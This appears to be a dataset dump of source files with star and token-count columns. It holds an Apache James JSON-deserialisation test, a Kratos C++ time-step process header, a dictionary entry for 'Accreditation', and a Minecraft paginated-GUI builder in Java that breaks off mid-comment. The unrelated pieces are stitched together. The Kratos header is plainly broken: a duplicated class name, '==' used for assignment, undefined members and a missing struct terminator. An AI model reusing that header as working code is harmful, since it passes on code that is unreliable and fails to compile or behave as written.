max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
634
/**************************************************************** * Licensed to the Apache Software Foundation (ASF) under one * * or more contributor license agreements. See the NOTICE file * * distributed with this work for additional information * * regarding copyright ownership. The ASF licenses this file * * to you under the Apache License, Version 2.0 (the * * "License"); you may not use this file except in compliance * * with the License. You may obtain a copy of the License at * * * * http://www.apache.org/licenses/LICENSE-2.0 * * * * Unless required by applicable law or agreed to in writing, * * software distributed under the License is distributed on an * * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * * KIND, either express or implied. See the License for the * * specific language governing permissions and limitations * * under the License. * ****************************************************************/ package org.apache.james.vault.dto.query; import static org.apache.james.vault.DeletedMessageFixture.SUBJECT; import static org.apache.mailet.base.MailAddressFixture.SENDER; import static org.assertj.core.api.Assertions.assertThat; import org.apache.james.vault.search.FieldName; import org.apache.james.vault.search.Operator; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.Test; import com.fasterxml.jackson.databind.ObjectMapper; class QueryElementDeserializerTest { private ObjectMapper objectMapper; @BeforeEach void beforeEach() { objectMapper = new ObjectMapper(); } @Test void shouldDeserializeNestedStructure() throws Exception { String queryJson = "{ " + " \"combinator\": \"and\", " + " \"criteria\": [ " + " { " + " \"combinator\": \"and\", " + " \"criteria\": [ " + " {\"fieldName\": \"subject\", \"operator\": \"contains\", \"value\": \"" + SUBJECT + "\"}," + " {\"fieldName\": \"sender\", \"operator\": \"equals\", \"value\": \"" + SENDER.asString() + "\"}" + " ] " + " }, " + " {\"fieldName\": \"hasAttachment\", 
\"operator\": \"equals\", \"value\": \"true\"}" + " ] " + "} "; QueryDTO queryDTO = objectMapper.readValue(queryJson, QueryDTO.class); assertThat(queryDTO) .isEqualTo(QueryDTO.and( QueryDTO.and( CriterionDTO.from(FieldName.SUBJECT, Operator.CONTAINS, SUBJECT), CriterionDTO.from(FieldName.SENDER, Operator.EQUALS, SENDER.asString())), CriterionDTO.from(FieldName.HAS_ATTACHMENT, Operator.EQUALS, "true") )); } @Test void shouldDeserializeFlattenStructure() throws Exception { String queryJson = "{ " + " \"combinator\": \"and\", " + " \"criteria\": [ " + " {\"fieldName\": \"subject\", \"operator\": \"contains\", \"value\": \"" + SUBJECT + "\"}," + " {\"fieldName\": \"sender\", \"operator\": \"equals\", \"value\": \"" + SENDER.asString() + "\"}," + " {\"fieldName\": \"hasAttachment\", \"operator\": \"equals\", \"value\": \"true\"}" + " ] " + "} "; QueryDTO queryDTO = objectMapper.readValue(queryJson, QueryDTO.class); assertThat(queryDTO) .isEqualTo(QueryDTO.and( CriterionDTO.from(FieldName.SUBJECT, Operator.CONTAINS, SUBJECT), CriterionDTO.from(FieldName.SENDER, Operator.EQUALS, SENDER.asString()), CriterionDTO.from(FieldName.HAS_ATTACHMENT, Operator.EQUALS, "true") )); } }
1,788
778
<filename>applications/SolidMechanicsApplication/custom_processes/time_discretization_process.hpp // // Project Name: KratosSolidMechanicsApplication $ // Created by: $Author: JMCarbonell $ // Last modified by: $Co-Author: $ // Date: $Date: September 2018 $ // Revision: $Revision: 0.0 $ // // #if !defined(KRATOS_TIME_DISCRETIZATION_PROCESS_H_INCLUDED ) #define KRATOS_TIME_DISCRETIZATION_PROCESS_H_INCLUDED // System includes // External includes // Project includes #include "includes/model_part.h" #include "utilities/openmp_utils.h" #include "geometries/triangle_2d_3.h" #include "geometries/triangle_2d_6.h" #include "geometries/tetrahedra_3d_4.h" #include "geometries/tetrahedra_3d_10.h" #include "processes/process.h" namespace Kratos { ///@name Kratos Globals ///@{ ///@} ///@name Type Definitions ///@{ typedef ModelPart::NodesContainerType NodesContainerType; typedef ModelPart::ElementsContainerType ElementsContainerType; typedef ModelPart::MeshType::GeometryType::PointsArrayType PointsArrayType; typedef GlobalPointersVector<Node<3> > NodeWeakPtrVectorType; typedef GlobalPointersVector<Element> ElementWeakPtrVectorType; typedef GlobalPointersVector<Condition> ConditionWeakPtrVectorType; ///@} ///@name Enum's ///@{ ///@} ///@name Functions ///@{ ///@} ///@name Kratos Classes ///@{ /// Short class definition. /** Detail class definition. */ class TimeDiscretizationProcessTimeDiscretizationProcess : public Process { public: ///@name Type Definitions ///@{ /// Pointer definition of TimeDiscretizationProcess KRATOS_CLASS_POINTER_DEFINITION( TimeDiscretizationProcess ); ///@} ///@name Life Cycle ///@{ /// Default constructor. TimeDiscretizationProcess(ModelPart& rModelPart) : mrModelPart(rModelPart) { } /// Default constructor. 
TimeDiscretizationProcess(ModelPart& rModelPart, Parameters rParameters) : Process(Flags()) , mrModelPart(rModelPart) { KRATOS_TRY Parameters default_parameters( R"( { "model_part_name":"MODEL_PART_NAME", "start_time": 0, "end_time": 1, "time_step": 1, "prediction_level": -1, "increase_factor": 2, "decrease_factor": 2, "steps_update_delay": 4 } )" ); // Validate against defaults -- this ensures no type mismatch rParameters.ValidateAndAssignDefaults(default_parameters); mTime.Initialize(rParameters["time_step"].GetDouble(), rParameters["start_time"].GetDouble(), rParameters["end_time"].GetDouble()); mTime.SetFactors(rParameters["increase_factor"].GetDouble(), rParameters["decrease_factor"].GetDouble(), rParameters["steps_update_delay"]); mTime.PredictionLevel = rParameters["prediction_level"].GetInt(); } /// Destructor. virtual ~TimeDiscretizationProcess() { } void operator()() { Execute(); } ///@} ///@name Operations ///@{ void Execute() override { KRATOS_TRY ProcessInfo& rCurrentProcessInfo = mrModelPart.GetProcessInfo(); if(!rCurrentProcessInfo[CONVERGENCE_ACHIEVED]) { this->ReduceTimeStep(); } else{ this->UpdateTimeStep(); } rCurrentProcessInfo[TIME] += mTime.CurrentStep; rCurrentProcessInfo[STEP] += 1; // it sets TIME and DELTA_TIME internally and Clones the SolutionStepData and ProcessInfo buffers mrModelPart.CloneTimeStep(rCurrentProcessInfo[TIME]); // update total time mTime.Total = rCurrentProcessInfo[TIME]; KRATOS_CATCH(""); } // Deprecated methods: // void PreExecute() // { // KRATOS_TRY // const double initialTimeInterval = rCurrentProcessInfo[INITIAL_DELTA_TIME]; // const double currentTimeInterval = rCurrentProcessInfo[CURRENT_DELTA_TIME]; // double updatedTime = rCurrentProcessInfo[TIME]; // double updatedTimeInterval = rCurrentProcessInfo[DELTA_TIME]; // double deltaTimeToNewMilestone = initialTimeInterval; // double minimumTimeInterval = initialTimeInterval*0.0001; // rCurrentProcessInfo.SetValue(PREVIOUS_DELTA_TIME,currentTimeInterval); // 
rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,false); // bool milestoneTimeReached=true; // bool increaseTimeInterval=true; // bool timeIntervalReduced=false; // double tolerance=0.0001; // updatedTime -= initialTimeInterval; // unsigned int previousMilestoneStep=updatedTime/initialTimeInterval; // deltaTimeToNewMilestone=initialTimeInterval*(previousMilestoneStep+1)-updatedTime; // updatedTimeInterval =currentTimeInterval; // bool badVelocityConvergence=rCurrentProcessInfo[BAD_VELOCITY_CONVERGENCE]; // bool badPressureConvergence=rCurrentProcessInfo[BAD_PRESSURE_CONVERGENCE]; // if(updatedTimeInterval<2.0*minimumTimeInterval && mEchoLevel > 0 && mrModelPart.GetCommunicator().MyPID() == 0){ // std::cout<<"ATTENTION! time step much smaller than initial time step, I'll not reduce it"<<std::endl; // } // if((badPressureConvergence==true || badVelocityConvergence==true) && updatedTimeInterval>(2.0*minimumTimeInterval)){ // updatedTimeInterval *=0.5; // /* std::cout<<"reducing time step (bad convergence at the previous step)"<<updatedTimeInterval<<std::endl; */ // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // timeIntervalReduced=true; // } // if(deltaTimeToNewMilestone<(1.0+tolerance)*updatedTimeInterval && deltaTimeToNewMilestone>initialTimeInterval*tolerance){ // rCurrentProcessInfo.SetValue(DELTA_TIME,deltaTimeToNewMilestone); // if(deltaTimeToNewMilestone<0.75*updatedTimeInterval){ // timeIntervalReduced=true; // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // } // updatedTimeInterval =deltaTimeToNewMilestone; // milestoneTimeReached=true; // }else{ // milestoneTimeReached=false; // rCurrentProcessInfo.SetValue(DELTA_TIME,updatedTimeInterval); // } // if(timeIntervalReduced==false){ // if(updatedTimeInterval>(2.0*minimumTimeInterval)){ // const unsigned int dimension = mrModelPart.ElementsBegin()->GetGeometry().WorkingSpaceDimension(); // if(dimension==2){ // 
CheckNodalConditionForTimeStepReduction(updatedTimeInterval,increaseTimeInterval,timeIntervalReduced); // if(timeIntervalReduced==false){ // CheckElementalConditionForTimeStepReduction(increaseTimeInterval); // } // } // } // // if(increaseTimeInterval==true && initialTimeInterval>(1.0+tolerance)*updatedTimeInterval && badPressureConvergence==false && badVelocityConvergence==false ){ // if(increaseTimeInterval==true && initialTimeInterval>(1.0+tolerance)*updatedTimeInterval && badVelocityConvergence==false ){ // IncreaseTimeInterval(updatedTimeInterval,deltaTimeToNewMilestone,tolerance,increaseTimeInterval); // } // else{ // increaseTimeInterval=false; // } // } // double newTimeInterval = rCurrentProcessInfo[DELTA_TIME]; // double milestoneGap=fabs(newTimeInterval-deltaTimeToNewMilestone); // if(milestoneGap<0.49*newTimeInterval && milestoneTimeReached==false){ // /* std::cout<<"the milestone is very close, I add "<<milestoneGap<<" to "<<newTimeInterval<<std::endl;*/ // newTimeInterval+=milestoneGap; // rCurrentProcessInfo.SetValue(DELTA_TIME,newTimeInterval); // milestoneTimeReached=true; // } // updatedTime+=newTimeInterval; // rCurrentProcessInfo.SetValue(TIME,updatedTime); // rCurrentProcessInfo.SetValue(CURRENT_DELTA_TIME,newTimeInterval); // /* if(newTimeInterval<(0.49*currentTimeInterval)){ */ // /* std::cout<<"ATTENTION! 
new time step is more than 2 times smaller than the previous one"<<std::endl; */ // /* } */ // if(increaseTimeInterval==false && milestoneTimeReached==true && fabs(newTimeInterval-initialTimeInterval)>tolerance && !(deltaTimeToNewMilestone>newTimeInterval*(1.0+tolerance))){ // rCurrentProcessInfo.SetValue(CURRENT_DELTA_TIME,currentTimeInterval); // } // if (newTimeInterval<initialTimeInterval){ // std::cout<<"current time "<<updatedTime<<" time step: new "<<newTimeInterval<<" previous "<<currentTimeInterval<<" initial "<<initialTimeInterval<<"\n"<<std::endl; // } // KRATOS_CATCH(""); // }; // void CheckNodalConditionForTimeStepReduction(double updatedTimeInterval, // bool &increaseTimeInterval, // bool &timeIntervalReduced) // { // ProcessInfo& rCurrentProcessInfo = mrModelPart.GetProcessInfo(); // #pragma omp parallel // { // ModelPart::NodeIterator NodeBegin; // ModelPart::NodeIterator NodeEnd; // OpenMPUtils::PartitionedIterators(mrModelPart.Nodes(),NodeBegin,NodeEnd); // for (ModelPart::NodeIterator itNode = NodeBegin; itNode != NodeEnd; ++itNode) // { // if(itNode->IsNot(TO_ERASE) && itNode->IsNot(ISOLATED) && itNode->IsNot(SOLID)){ // const array_1d<double,3> &Vel = itNode->FastGetSolutionStepValue(VELOCITY); // double NormVelNode=0; // for (unsigned int d = 0; d < 3; ++d){ // NormVelNode+=Vel[d] * Vel[d]; // } // double motionInStep=sqrt(NormVelNode)*updatedTimeInterval; // double unsafetyFactor=0; // NodeWeakPtrVectorType& neighb_nodes = itNode->GetValue(NEIGHBOUR_NODES); // for (NodeWeakPtrVectorType::iterator nn = neighb_nodes.begin();nn != neighb_nodes.end(); ++nn) // { // array_1d<double,3> CoorNeighDifference=itNode->Coordinates()-nn->Coordinates(); // double squaredDistance=0; // for (unsigned int d = 0; d < 3; ++d){ // squaredDistance+=CoorNeighDifference[d]*CoorNeighDifference[d]; // } // double nodeDistance=sqrt(squaredDistance); // double tempUnsafetyFactor=motionInStep/nodeDistance; // if(tempUnsafetyFactor>unsafetyFactor){ // 
unsafetyFactor=tempUnsafetyFactor; // } // } // if(unsafetyFactor>0.35){ // increaseTimeInterval=false; // if(unsafetyFactor>1.0){ // double temporaryTimeInterval = rCurrentProcessInfo[DELTA_TIME]; // double reducedTimeInterval=0.5*updatedTimeInterval; // if(reducedTimeInterval<temporaryTimeInterval){ // rCurrentProcessInfo.SetValue(DELTA_TIME,reducedTimeInterval); // /* std::cout<<"reducing time step (nodal criterion)"<<reducedTimeInterval<<std::endl; */ // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // timeIntervalReduced=true; // break; // } // } // } // } // } // } // } // void CheckElementalConditionForTimeStepReduction(bool &increaseTimeInterval) // { // ProcessInfo& rCurrentProcessInfo = mrModelPart.GetProcessInfo(); // #pragma omp parallel // { // ModelPart::ElementIterator ElemBegin; // ModelPart::ElementIterator ElemEnd; // OpenMPUtils::PartitionedIterators(mrModelPart.Elements(),ElemBegin,ElemEnd); // for ( ModelPart::ElementIterator itElem = ElemBegin; itElem != ElemEnd; ++itElem ) // { // double temporaryTimeInterval=rCurrentProcessInfo[DELTA_TIME]; // double currentElementalArea = 0; // const unsigned int dimension = (itElem)->GetGeometry().WorkingSpaceDimension(); // if(dimension==2){ // currentElementalArea = (itElem)->GetGeometry().Area(); // Geometry<Node<3> > updatedElementCoordinates; // bool solidElement=false; // for(unsigned int i=0; i<itElem->GetGeometry().size(); ++i) // { // if(itElem->GetGeometry()[i].Is(SOLID) || itElem->GetGeometry()[i].Is(TO_ERASE) || itElem->IsNot(ACTIVE)){ // solidElement=true; // } // const array_1d<double,3> &Vel = itElem->GetGeometry()[i].FastGetSolutionStepValue(VELOCITY); // Point updatedNodalCoordinates=itElem->GetGeometry()[i].Coordinates()+Vel*temporaryTimeInterval; // updatedElementCoordinates.push_back(Kratos::make_shared<Node<3> >(i,updatedNodalCoordinates.X(),updatedNodalCoordinates.Y(),updatedNodalCoordinates.Z())); // } // double newArea=0; // if(itElem->GetGeometry().size()==3){ // 
Triangle2D3<Node<3> > myGeometry(updatedElementCoordinates); // newArea=myGeometry.Area(); // }else if(itElem->GetGeometry().size()==6){ // Triangle2D6<Node<3> > myGeometry(updatedElementCoordinates); // newArea=myGeometry.Area(); // }else{ // std::cout<<"GEOMETRY NOT DEFINED"<<std::endl; // } // if(solidElement==true){ // newArea=currentElementalArea; // } // if(newArea<0.001*currentElementalArea && currentElementalArea>0){ // double reducedTimeInterval=0.5*temporaryTimeInterval; // if(reducedTimeInterval<temporaryTimeInterval){ // rCurrentProcessInfo.SetValue(DELTA_TIME,reducedTimeInterval); // /* std::cout<<"reducing time step (elemental inversion)"<<reducedTimeInterval<<std::endl; */ // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // increaseTimeInterval=false; // break; // } // }else{ // Geometry<Node<3> > updatedEnlargedElementCoordinates; // for(unsigned int i=0; i<itElem->GetGeometry().size(); ++i) // { // const array_1d<double,3> &Vel = itElem->GetGeometry()[i].FastGetSolutionStepValue(VELOCITY); // Point updatedNodalCoordinates=itElem->GetGeometry()[i].Coordinates()+Vel*temporaryTimeInterval*2.5; // updatedEnlargedElementCoordinates.push_back(Kratos::make_shared<Node<3> >(i,updatedNodalCoordinates.X(),updatedNodalCoordinates.Y(),updatedNodalCoordinates.Z())); // } // if(itElem->GetGeometry().size()==3){ // Triangle2D3<Node<3> > myGeometry(updatedEnlargedElementCoordinates); // newArea=myGeometry.Area(); // }else if(itElem->GetGeometry().size()==6){ // Triangle2D6<Node<3> > myGeometry(updatedEnlargedElementCoordinates); // newArea=myGeometry.Area(); // }else{ // std::cout<<"GEOMETRY NOT DEFINED"<<std::endl; // } // if(newArea<0.001*currentElementalArea && currentElementalArea>0){ // increaseTimeInterval=false; // /* std::cout<<"I'll not reduce the time step but I'll not allow to increase it"<<std::endl; */ // } // } // } // else if(dimension==3){ // double currentElementalVolume = (itElem)->GetGeometry().Volume(); // Geometry<Node<3> > 
updatedElementCoordinates; // bool solidElement=false; // for(unsigned int i=0; i<itElem->GetGeometry().size(); ++i) // { // if(itElem->GetGeometry()[i].Is(SOLID) || itElem->IsNot(ACTIVE)){ // solidElement=true; // } // const array_1d<double,3> &Vel = itElem->GetGeometry()[i].FastGetSolutionStepValue(VELOCITY); // Point updatedNodalCoordinates=itElem->GetGeometry()[i].Coordinates()+Vel*temporaryTimeInterval; // updatedElementCoordinates.push_back(Kratos::make_shared<Node<3> >(i,updatedNodalCoordinates.X(),updatedNodalCoordinates.Y(),updatedNodalCoordinates.Z())); // } // double newVolume=0; // if(itElem->GetGeometry().size()==4){ // Tetrahedra3D4<Node<3> > myGeometry(updatedElementCoordinates); // newVolume=myGeometry.Volume(); // }else if(itElem->GetGeometry().size()==10){ // Tetrahedra3D10<Node<3> > myGeometry(updatedElementCoordinates); // newVolume=myGeometry.Volume(); // }else{ // std::cout<<"GEOMETRY NOT DEFINED"<<std::endl; // } // if(solidElement==true){ // newVolume=currentElementalVolume; // } // if(newVolume<0.001*currentElementalVolume && currentElementalVolume>0){ // double reducedTimeInterval=0.5*temporaryTimeInterval; // if(reducedTimeInterval<temporaryTimeInterval){ // rCurrentProcessInfo.SetValue(DELTA_TIME,reducedTimeInterval); // /* std::cout<<"reducing time step (elemental inversion)"<<reducedTimeInterval<<std::endl; */ // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // increaseTimeInterval=false; // break; // } // }else{ // Geometry<Node<3> > updatedEnlargedElementCoordinates; // for(unsigned int i=0; i<itElem->GetGeometry().size(); ++i) // { // const array_1d<double,3> &Vel = itElem->GetGeometry()[i].FastGetSolutionStepValue(VELOCITY); // Point updatedNodalCoordinates=itElem->GetGeometry()[i].Coordinates()+Vel*temporaryTimeInterval*2.5; // updatedEnlargedElementCoordinates.push_back(Kratos::make_shared<Node<3> >(i,updatedNodalCoordinates.X(),updatedNodalCoordinates.Y(),updatedNodalCoordinates.Z())); // } // 
if(itElem->GetGeometry().size()==4){ // Tetrahedra3D4<Node<3> > myGeometry(updatedEnlargedElementCoordinates); // newVolume=myGeometry.Volume(); // }else if(itElem->GetGeometry().size()==10){ // Tetrahedra3D10<Node<3> > myGeometry(updatedEnlargedElementCoordinates); // newVolume=myGeometry.Volume(); // }else{ // std::cout<<"GEOMETRY NOT DEFINED"<<std::endl; // } // if(newVolume<0.001*currentElementalVolume && currentElementalVolume>0){ // increaseTimeInterval=false; // /* std::cout<<"I'll not reduce the time step but I'll not allow to increase it"<<std::endl; */ // } // } // } // } // } // } // void IncreaseTimeInterval(double updatedTimeInterval, // double deltaTimeToNewMilestone, // double tolerance, // bool &increaseTimeInterval) // { // ProcessInfo& rCurrentProcessInfo = mrModelPart.GetProcessInfo(); // double increasedTimeInterval = 2.0 * updatedTimeInterval; // if(increasedTimeInterval<deltaTimeToNewMilestone*(1.0+tolerance)) // { // rCurrentProcessInfo.SetValue(DELTA_TIME,increasedTimeInterval); // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // } // else{ // increaseTimeInterval=false; // } // } ///@} ///@name Operators ///@{ ///@} ///@name Access ///@{ ///@} ///@name Inquiry ///@ ///@} ///@name Input and output ///@{ /// Turn back information as a string. std::string Info() const override { return "TimeDiscretizationProcess"; } /// Print information about this object. 
void PrintInfo(std::ostream& rOStream) const override { rOStream << "TimeDiscretizationProcess"; } protected: ///@name Protected static Member Variables ///@{ ///@} ///@name Protected member Variables ///@{ struct TimeParameters { int PredictionLevel; double InitialStep; double PreviousStep; double CurrentStep; double PredictedStep; double Total; double Start; double End; double MileStone; double IncreaseFactor; double DecreaseFactor; int UpdateDelay; int DelayCounter; void Initialize(const double& rTimeStep, const double& rStartTime, const double& rEndTime) { Predict = false; PredictionLevel = 0; InitialStep = rTimeStep; PreviousStep = rTimeStep; CurrentStep = rTimeStep; Start = rStartTime; End = rEndTime; MileStone = rTimeStep+rTimeStep; } void SetFactors(const double& rIncreaseFactor, const double& rDecreaseFactor, const double& rDelay) { IncreaseFactor = rIncreaseFactor; DecreaseFactor = rDecreaseFactor; UpdateDelay = rDelay; } bool Increase() { if( !ActiveDelay() ){ PreviousStep = CurrentStep; CurrentStep = PreviousStep + IncreaseFactor; if( InitialStep <= CurrentStep ) CurrentStep == InitialStep; if( Total+CurrentStep >= MileStone ){ CurrentStep == MileStone-Total; MileStone += InitialStep; } } return CheckSameTime(PreviousStep, CurrentStep); } bool Decrease() { if( !ActiveDelay() ){ PreviousStep = CurrentStep; CurrentStep = PreviousStep - DecreaseFactor; if( CurrentStep <= 1e-2*InitialStep ) CurrentStep = 1e-2*InitialStep; } return CheckSameTime(PreviousStep, CurrentStep); } bool PredictActive() { if( PredictionLevel >= 0) { if( PredictionLevel == 0 && Total > Start ) return false; else return true; } } bool Update() { if( PredictedStep > CurrentStep ) return Increase(); else return Decrease(); } bool ActiveDelay() { if( DelayCounter == UpdateDelay ) { DelayCounter = 0; return false; } else{ ++DelayCounter; return true; } } bool CheckSameTime(const double& rTime, const double& rNewTime) { double tolerance = Initial * 1e-5; if( rNewTime > rTime-tolerance && 
rNewTime < rTime+tolerance ) return true; else return false; } } ///@} ///@name Protected Operators ///@{ ///@} ///@name Protected Operations ///@{ void ReduceTimeStep() { KRATOS_TRY rCurrentProcessInfo[TIME] -= mTime.CurrentStep; rCurrentProcessInfo[STEP] -= 1; mrModelPart.ReduceTimeStep(rCurrentProcessInfo[TIME]); rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED, mTime.Decrease()); KRATOS_CATCH(""); } void UpdateTimeStep() { KRATOS_TRY this->PredictTimeStep(); rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED, mTime.Update()); KRATOS_CATCH(""); } void PredictTimeStep() { KRATOS_TRY if( mTime.PredictActive() ){ this->PredictTimeStep(mTime.PredictedStep); } KRATOS_CATCH(""); } void PredictTimeStep(double& rTimeStep) { KRATOS_TRY KRATOS_CATCH(""); } void CheckCriticalElement() { KRATOS_TRY KRATOS_CATCH(""); } ///@} ///@name Protected Access ///@{ ///@} ///@name Protected Inquiry ///@{ ///@} ///@name Protected LifeCycle ///@{ ///@} private: ///@name Private Static Member Variables ///@{ ModelPart& mrModelPart; TimeParameters mTime; ///@} ///@name Private Member Variables ///@{ ///@} ///@name Private Operators ///@{ ///@} ///@name Private Operations ///@{ ///@} ///@name Private Access ///@{ ///@} ///@name Private Inquiry ///@{ ///@} ///@name Un accessible methods ///@{ /// Assignment operator. TimeDiscretizationProcess& operator=(TimeDiscretizationProcess const& rOther); /// Copy constructor. //TimeDiscretizationProcess(TimeDiscretizationProcess const& rOther); ///@} }; // Class TimeDiscretizationProcess ///@} ///@name Type Definitions ///@{ ///@} ///@name Input and output ///@{ /// input stream function inline std::istream& operator >> (std::istream& rIStream, TimeDiscretizationProcess& rThis); /// output stream function inline std::ostream& operator << (std::ostream& rOStream, const TimeDiscretizationProcess& rThis) { rThis.PrintInfo(rOStream); rOStream << std::endl; rThis.PrintData(rOStream); return rOStream; } ///@} } // namespace Kratos. 
#endif // KRATOS_TIME_DISCRETIZATION_PROCESS_H_INCLUDED defined
10,687
335
<filename>A/Accreditation_noun.json { "word": "Accreditation", "definitions": [ "The action or process of officially recognizing someone as having a particular status or being qualified to perform a particular activity.", "Official certification that a school or course has met standards set by external regulators.", "An acknowledgement of a person's responsibility for or achievement of something." ], "parts-of-speech": "Noun" }
133
355
/*
 * This file is part of helper, licensed under the MIT License.
 *
 * Copyright (c) lucko (Luck) <<EMAIL>>
 * Copyright (c) contributors
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in all
 * copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 * SOFTWARE.
 */

package me.lucko.helper.menu.paginated;

import com.google.common.collect.ImmutableList;

import me.lucko.helper.item.ItemStackBuilder;
import me.lucko.helper.menu.Item;
import me.lucko.helper.menu.scheme.MenuScheme;
import me.lucko.helper.menu.scheme.StandardSchemeMappings;
import me.lucko.helper.utils.annotation.NonnullByDefault;

import org.bukkit.Material;
import org.bukkit.entity.Player;
import org.bukkit.inventory.ItemStack;

import java.util.List;
import java.util.Objects;
import java.util.function.Function;

/**
 * Specification class for a {@link PaginatedGui}.
 */
@NonnullByDefault
public class PaginatedGuiBuilder {
    public static final int DEFAULT_LINES = 6;

    /** Slot used for the "next page" button (bottom row, second from right). */
    public static final int DEFAULT_NEXT_PAGE_SLOT = new MenuScheme()
            .maskEmpty(5)
            .mask("000000010")
            .getMaskedIndexes().get(0);

    /** Slot used for the "previous page" button (bottom row, second from left). */
    public static final int DEFAULT_PREVIOUS_PAGE_SLOT = new MenuScheme()
            .maskEmpty(5)
            .mask("010000000")
            .getMaskedIndexes().get(0);

    /** Slots available for page content (the 7x5 inner area). */
    public static final List<Integer> DEFAULT_ITEM_SLOTS = new MenuScheme()
            .mask("011111110")
            .mask("011111110")
            .mask("011111110")
            .mask("011111110")
            .mask("011111110")
            .getMaskedIndexesImmutable();

    /** Border decoration scheme (stained glass down both edges). */
    public static final MenuScheme DEFAULT_SCHEME = new MenuScheme(StandardSchemeMappings.STAINED_GLASS)
            .mask("100000001")
            .mask("100000001")
            .mask("100000001")
            .mask("100000001")
            .mask("100000001")
            .mask("100000001")
            .scheme(3, 3)
            .scheme(3, 3)
            .scheme(3, 3)
            .scheme(3, 3)
            .scheme(3, 3)
            .scheme(3, 3);

    public static final Function<PageInfo, ItemStack> DEFAULT_NEXT_PAGE_ITEM = pageInfo ->
            ItemStackBuilder.of(Material.ARROW)
                    .name("&b&m--&b>")
                    .lore("&fSwitch to the next page.")
                    .lore("")
                    .lore("&7Currently viewing page &b" + pageInfo.getCurrent() + "&7/&b" + pageInfo.getSize())
                    .build();

    public static final Function<PageInfo, ItemStack> DEFAULT_PREVIOUS_PAGE_ITEM = pageInfo ->
            ItemStackBuilder.of(Material.ARROW)
                    .name("&b<&b&m--")
                    .lore("&fSwitch to the previous page.")
                    .lore("")
                    .lore("&7Currently viewing page &b" + pageInfo.getCurrent() + "&7/&b" + pageInfo.getSize())
                    .build();

    public static PaginatedGuiBuilder create() {
        return new PaginatedGuiBuilder();
    }

    private int lines;
    private String title;
    private List<Integer> itemSlots;
    private int nextPageSlot;
    private int previousPageSlot;
    private MenuScheme scheme;
    private Function<PageInfo, ItemStack> nextPageItem;
    private Function<PageInfo, ItemStack> previousPageItem;

    private PaginatedGuiBuilder() {
        this.lines = DEFAULT_LINES;
        this.itemSlots = DEFAULT_ITEM_SLOTS;
        this.nextPageSlot = DEFAULT_NEXT_PAGE_SLOT;
        this.previousPageSlot = DEFAULT_PREVIOUS_PAGE_SLOT;
        this.scheme = DEFAULT_SCHEME;
        this.nextPageItem = DEFAULT_NEXT_PAGE_ITEM;
        this.previousPageItem = DEFAULT_PREVIOUS_PAGE_ITEM;
    }

    /** Returns a deep-enough copy of this builder (the scheme is copied, the rest shared). */
    public PaginatedGuiBuilder copy() {
        PaginatedGuiBuilder copy = new PaginatedGuiBuilder();
        copy.lines = this.lines;
        copy.title = this.title;
        copy.itemSlots = this.itemSlots;
        copy.nextPageSlot = this.nextPageSlot;
        copy.previousPageSlot = this.previousPageSlot;
        copy.scheme = this.scheme.copy();
        copy.nextPageItem = this.nextPageItem;
        copy.previousPageItem = this.previousPageItem;
        return copy;
    }

    public PaginatedGuiBuilder lines(int lines) {
        this.lines = lines;
        return this;
    }

    public PaginatedGuiBuilder title(String title) {
        this.title = title;
        return this;
    }

    public PaginatedGuiBuilder itemSlots(List<Integer> itemSlots) {
        this.itemSlots = ImmutableList.copyOf(itemSlots);
        return this;
    }

    public PaginatedGuiBuilder nextPageSlot(int nextPageSlot) {
        this.nextPageSlot = nextPageSlot;
        return this;
    }

    public PaginatedGuiBuilder previousPageSlot(int previousPageSlot) {
        this.previousPageSlot = previousPageSlot;
        return this;
    }

    public PaginatedGuiBuilder scheme(MenuScheme scheme) {
        this.scheme = Objects.requireNonNull(scheme, "scheme");
        return this;
    }

    public PaginatedGuiBuilder nextPageItem(Function<PageInfo, ItemStack> nextPageItem) {
        this.nextPageItem = Objects.requireNonNull(nextPageItem, "nextPageItem");
        return this;
    }

    public PaginatedGuiBuilder previousPageItem(Function<PageInfo, ItemStack> previousPageItem) {
        this.previousPageItem = Objects.requireNonNull(previousPageItem, "previousPageItem");
        return this;
    }

    public int getLines() {
        return this.lines;
    }

    public String getTitle() {
        return this.title;
    }

    public List<Integer> getItemSlots() {
        return this.itemSlots;
    }

    public int getNextPageSlot() {
        return this.nextPageSlot;
    }

    public int getPreviousPageSlot() {
        return this.previousPageSlot;
    }

    public MenuScheme getScheme() {
        return this.scheme;
    }

    public Function<PageInfo, ItemStack> getNextPageItem() {
        return this.nextPageItem;
    }

    public Function<PageInfo, ItemStack> getPreviousPageItem() {
        return this.previousPageItem;
    }

    /**
     * Builds the {@link PaginatedGui} for the given player.
     *
     * @param player the viewer of the gui
     * @param content function producing the page items
     * @return the constructed gui
     * @throws NullPointerException if the title (or any other required property) was never set
     */
    public PaginatedGui build(Player player, Function<PaginatedGui, List<Item>> content) {
        Objects.requireNonNull(player, "player");
        Objects.requireNonNull(content, "content");
        // BUGFIX: requireNonNull checks on the primitive int fields (lines,
